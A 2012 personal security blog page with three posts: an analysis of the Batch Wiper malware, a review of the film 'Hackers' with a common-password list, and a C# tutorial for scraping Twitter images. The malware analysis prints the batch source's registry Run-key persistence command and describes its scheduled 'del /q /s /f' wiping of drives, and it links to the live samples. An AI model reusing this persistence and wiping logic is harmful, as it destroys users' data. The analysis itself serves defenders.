Friday, December 28, 2012

A look into the Batch Wiper virus

The Iranian CERT reported the existence of a new targeted data wiping malware.
Although first thought as another serious  country level virus, further, deeper analysis show that it is relatively simple attack.

GrooveMonitor.exe is the main file.
Checking the file with a Hex Editor we notice something nice.

Basically its a self extracting RAR file.
Opening the archive we see 3 more files, jucheck.exe, juboot.exe and SLEEP.EXE.

If we look at juboot.exe in a hex editor we find the following signature




The header belongs to "the Ultimate Packer for eXecutables" (http://upx.sourceforge.net).
I then opened the file with PE Explorer allowing me to see that the file is basically a Bat file with the following content:

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"


It looks like justboot.exe runs sleep for 2 and then adds registry keys ensuring that 'jucheck.exe' is executed each time the computer starts up.

In the same manner, checking jucheck.exe, it is also a batch file.
The batch file is longer this time so I'll summarize it for you. I made the source is available on pastebin, http://pastebin.com/B2jKHUDH .

First sleep for 2 just like with the juboot.exe
then it deletes the juboot.exe file and the original GrooveMonitor.exe
The code then checks for specific dates to run. the dates are:
  • 10-12/Dec/2012
  • 21-23/Jan/2013
  • 6-8/May/2013
  • 22-24/Jul/2013
  • 11-13/Nov/2013
  • 3-5/Feb/2014
  • 5-7/May/2014
  • 11-13/Aug/2014
  • 2-4/Feb/2015
On these dates it attempts to wipe the data on the local drive using a simple "del /q /s /f" command on drives D, E, F, G, H and I.

The batch then moves on and attempts to erase the desktop in the same way.
Finally, the batch file runs "calc" (Where did this come from ?).

I haven't finished messing with the samples but as you've seen its not a sophisticated attack and will be easy to detect and stop before any damage is done.

If you want to look at the samples for yourselves, I've made them available at http://turbobit.net/aywxvv08e83b.html

Enjoy.

Sunday, December 23, 2012

Hack the planet


Hackers (1995)

This weekend I took the time to re-watch one of the best hacker movies that I believe to be a true classic, "Hackers". The film was released in 1995, a while back and featured a cool cast list. Check it out at http://www.imdb.com/title/tt0113243/
Its true that the movie is outdated and the graphical effects have nothing to do with actual hacking but, the movie has great things in it even for today's viewer.
 
Angelina Jolie - Hackers (1995)

 

Angelina Jolie as a hacker

Angelina plays "Acid Burn", an "Elite" hacker showing that women can hold their own in this world.















The warning to keep away from most common passwords.

In the movie, the first hack to the Gibson mainframe used one of the four most used passwords that were Love, Sex, Secret and God.
I'm not sure if it was true back in 1995 but according to different breaches and leaks from the past year the top passwords in 2012 are actually:
  1. password
  2. 123456 /12345678 /1234 /12345
  3. qwerty
  4. dragon
  5. baseball
  6. football
  7. letmein (one of my favorites)
  8. monkey
  9. 111111
 Please lets be a bit more creative in 2013.
 Just to further emphasize the point, a scene from another great classic Spaceballs.


Online worldwide hacking community




This is only a small part of the movie but it is very much relevant in today's world.
Locking at hacker groups and the way they operate, there is no real meaning to countries and borders. Although some hacker groups are associated with countries, there is no way to determinate the nationality or location of the members. A great example would be Anonymous, there are no real leaders and no one cause allowing anyone to join and calling upon all that can to do so.

Great One liners

Some of these really caught on.
"Mess with the best Die like the rest"
"Hacking is more than just a crime, it a survival trade"
And of course my favorite, "Hack the planet"


Have you seen the movie ?
What do you think ?

Saturday, December 15, 2012

View Twitter profile images

A while ago I've noticed that Twitter changed their design for the users images.
Previewing an image, we used to have the option to receive a picture grid of all the images the user posted however it seems that Twitter disabled the feature allowing visitors to view one image at a time.
The missing grid view is a pain and a lot of people want it back as seen in this support thread at Twitter: https://dev.twitter.com/discussions/9843

So I made a decision to create an application that will let me get a profiles images easily.

The Obvious way to go about programming this is using the Twitter API (after reading the documentation of course :-) ).
I've notice two Twitter api functions that allow us to reach our goal using the plain and simple HTTP GET protocol.

1 - http://api.twitter.com/1/statuses/user_timeline.xml?screen_name=CodeBTL
The user_ timeline.xml command returns a simple XML file with the recent tweets.
The function supports additional parameters like count that allows you top specify the max amount of tweets to receive and trim_user that removes appended user data.
Xml result from the Twitter user_timeline function





Notice that for each tweet we get the tweet id and the tweet text.

2 - http://api.twitter.com/1/statuses/show.xml?id=279580723336331264&include_entities=1
The show.xml function receives a tweet id and returns the XML description.
Like most functions on twitter, the function supports additional parameters the most important one for us is the include_entities that can show us if any media links exist in the tweet allowing us to take the link and display it.
Xml result from the Twitter show function
When testing my application I found a big problem.
Twitter limits unauthenticated requests to 150 per hour and each of our GET REQUEST's counts as one. Reference https://dev.twitter.com/docs/rate-limiting 
That means we can only check under 150 tweets for images and this really limits us.
I tried registering and application with Twitter and authenticating a user for the requests but the limit seems to be final.
The only option a saw to bypass the limit is not use the Twitter API and to do some HTML scraping.

I created a simple form allowing the user to enter the twitter username he want to retrieve images of.

Once selected I used the first URL on this post figuring that for now 150 user requests per hour was enough. The result is an XML file with up to 200 status nodes.

I iterate through all of the status texts looking for links.
Twitter changes all posted links (for media files uploaded too) to the twitter format of t.co
to check we can use a regular expression
Match m = Regex.Match(TweetText, @"(?<twitterURL>t.co)/(?<subdir>[^\s]*)");

If we found a link we cant just download since there will be a redirection from twitter to the location of the original link. In order to capture the actual image we send an HTTP HEAD request to get the redirect URL like the following:
    var request = (HttpWebRequest)WebRequest.Create(new Uri(@"http://t.co/" + m.Groups["subdir"].Value));
    request.Method = "HEAD";
    request.AllowAutoRedirect = false;
    string location;
    using (var response = request.GetResponse() as HttpWebResponse)  

    {
         location = response.GetResponseHeader("Location");
    }


Upon receiving the new location we can notice that we are not redirected to the image itself but to a web page displaying the image.

Currently I support two types of images, hosted on twitter (URL starts with twitter.com and contains /photo/ ) or hosted on instagram (URL starts with instagr.am).
To finish our scraping session we need to find on the web page the correct image tag.
For twitter, the img tag class attribute has the value "large media-slideshow-image".
For instagram, the img tag class attribute has the value "photo".


Since all of the code up to this point was self written, I didn't want to use the HTML Agility Pack or a different third party component. So using regular expressions again I write the GetImageTags function
        private List<ImgTag> GetImageTags(String html)
        {
            List<ImgTag> imgTags = new List<ImgTag>();
            MatchCollection m1 = Regex.Matches(html, @"(<img.*?>.*?>)", RegexOptions.Singleline);
            foreach (Match m in m1)
            {
                string value = m.Groups[1].Value;
                ImgTag imgTag = new ImgTag();
                Match m2 = Regex.Match(value, @"src=\""(.*?)\""", RegexOptions.Singleline);
                if (m2.Success)
                {
                    imgTag.src = m2.Groups[1].Value;                   
                }
                m2 = Regex.Match(value, @"class=\""(.*?)\""", RegexOptions.Singleline);
                if (m2.Success)
                {
                    imgTag.classAtt = m2.Groups[1].Value;
                }
                imgTags.Add(imgTag);
            }
            return imgTags;
        }



If we retrieve the src attribute value, all we have left to do is download the image.

You can get the Twitter image downloader application at my codeplex project page https://twitterimagedownload.codeplex.com/
Take a look at the source code. Recommendations and remarks welcome.

Update 29/6/2013 : I've updated the project to support the Twitter API Ver. 1.1.
That should fix the crash issue that occurred when fetching the images.


Twitter Image Downloader